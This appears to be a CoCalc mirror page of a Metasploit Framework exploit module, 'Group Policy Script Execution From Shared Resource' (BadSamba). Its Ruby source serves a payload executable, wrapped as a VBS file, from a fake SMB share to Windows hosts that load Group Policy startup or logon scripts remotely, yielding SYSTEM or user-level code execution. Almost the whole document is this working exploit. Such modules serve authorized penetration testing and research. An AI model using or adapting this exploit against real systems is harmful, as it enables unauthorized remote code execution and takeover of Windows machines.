Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/smb/group_policy_startup.rb
19850 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ManualRanking

8


9
  include Msf::Exploit::Remote::SMB::Server::Share

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Group Policy Script Execution From Shared Resource',

16
        'Description' => %q{

17
          This is a general-purpose module for exploiting systems with Windows Group Policy

18
          configured to load VBS startup/logon scripts from remote locations. This module runs

19
          a SMB shared resource that will provide a payload through a VBS file. Startup scripts

20
          will be executed with SYSTEM privileges, while logon scripts will be executed with the

21
          user privileges. Have into account which the attacker still needs to redirect the

22
          target traffic to the fake SMB share to exploit it successfully. Please note in some

23
          cases, it will take 5 to 10 minutes to receive a session.

24
        },

25
        'Author' => [

26
          'Sam Bertram <sbertram[at]gdssecurity.com>', # BadSamba

27
          'juan vazquez' # msf module

28
        ],

29
        'References' => [

30
          ['URL', 'http://blog.gdssecurity.com/labs/2015/1/26/badsamba-exploiting-windows-startup-scripts-using-a-maliciou.html'],

31
          ['URL', 'https://github.com/GDSSecurity/BadSamba']

32
        ],

33
        'DefaultOptions' => {

34
          'EXITFUNC' => 'thread',

35
        },

36
        'Privileged' => false,

37
        'Platform' => 'win',

38
        'Arch' => [ARCH_X86, ARCH_X64],

39
        'Payload' => {

40
          'Space' => 2048,

41
          'DisableNops' => true

42
        },

43
        'Targets' => [

44
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],

45
          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]

46
        ],

47
        'DefaultTarget' => 0,

48
        'DisclosureDate' => '2015-01-26',

49
        'Notes' => {

50
          'AKA' => ['badsamba'],

51
          'Stability' => UNKNOWN_STABILITY,

52
          'Reliability' => UNKNOWN_RELIABILITY,

53
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

54
        }

55
      )

56
    )

57


58
    register_options(

59
      [

60
        OptString.new('FILE_NAME', [ false, 'VBS File name to share (Default: random .vbs)'])

61
      ]

62
    )

63


64
    deregister_options('FILE_CONTENTS')

65
  end

66


67
  def setup

68
    super

69
    self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.vbs"

70
    @custom_payloads = {}

71
    print_status("File available on #{unc}...")

72
  end

73


74
  def on_client_connect(client)

75
    super(client)

76


77
    unless @custom_payloads[:client]

78
      p = regenerate_payload(client)

79
      exe = p.encoded_exe

80
      @custom_payloads[client] = Msf::Util::EXE.to_exe_vbs(exe)

81
    end

82
  end

83


84
  def get_file_contents(client:)

85
    contents = @custom_payloads[client] || super(client: client)

86


87
    contents

88
  end

89
end

90


91